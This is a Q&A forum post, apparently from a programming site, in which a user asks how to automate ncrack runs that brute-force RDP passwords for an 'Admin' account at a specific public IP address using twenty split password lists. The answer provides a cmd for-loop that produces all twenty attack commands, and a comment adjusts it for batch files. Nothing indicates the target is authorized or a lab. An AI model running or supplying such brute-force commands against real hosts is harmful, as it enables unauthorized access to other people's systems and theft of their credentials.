# Run cmd command automatically

Tags: batch-file, cmd

I use `ncrack` and I use some pass lists , 20 mb , I want to split the list in 20 peaces , 1 mb each

I open `cmd.exe` and paste manually this string:

```
ncrack -v --user Admin -P  1mbPASS.TXT 5.2.225.45:3389
```

after is finishing I paste manually the second string with the second pass :

```
ncrack -v --user Admin -P  2mbPASS.TXT 5.2.225.45:3389
```

Anyone knows a script or something to run AUTOMATICALLY the second pass and then the 3'rd pass … then the 20 pass list etc... `cmd` starting automatically ?

Answer (score 1):

```
ncrack -v --user Admin -P  1mbPASS.TXT 5.2.225.45:3389
ncrack -v --user Admin -P  2mbPASS.TXT 5.2.225.45:3389
rem                        ^ this number
```

If your commands differ *only* in the place shown above, then you can try next [`for` loop](http://ss64.com/nt/for.html):

```
for /L %G in (1,1,20) do @echo ncrack -v --user Admin -P %GmbPASS.TXT 5.2.225.45:3389
rem output (no execution) should show commands changing  ^ this number
```

Remove `@echo` part no sooner than debugged.

Comment: I think it would be good to note that in batch-files you need `%%G` instead of `%G`